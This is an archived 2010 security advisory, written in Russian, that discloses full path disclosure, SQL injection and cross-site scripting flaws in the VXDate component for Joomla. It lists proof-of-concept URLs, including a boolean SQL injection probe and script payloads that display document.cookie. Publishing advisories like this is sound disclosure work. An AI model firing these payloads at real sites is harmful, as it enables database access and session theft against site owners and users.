Computer Security

Security Advisory: Vulnerabilities in VXDate for Joomla
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Pars CMS SQL Injection Vulnerability

  Zigurrat CMS SQL Injection Vulnerability

  Ananta Gazelle SQL Injection Vulnerability

  [SECURITY] [DSA 2016-1] New drupal6 packages fix several vulnerabilities

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:15.03.2010
Subject:Vulnerabilities in VXDate for Joomla

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure, SQL Injection и Cross-Site Scripting уязвимостях в компоненте VXDate (com_vxdate) для Joomla.

Full path disclosure:

http://site/index.php?option=com_vxdate&ct=’

http://site/index.php?option=com_vxdate&ct=1&md=details&id=’

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’

SQL Injection:

http://site/index.php?option=com_vxdate&ct=1&md=details&id=-
1%20or%20version()=5

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-
1%20or%20version()=5

XSS:

http://site/index.
php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

http://site/index.
php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(
document.cookie)%3C/script%3E

Уязвимы потенциально все версии VXDate.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3849/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server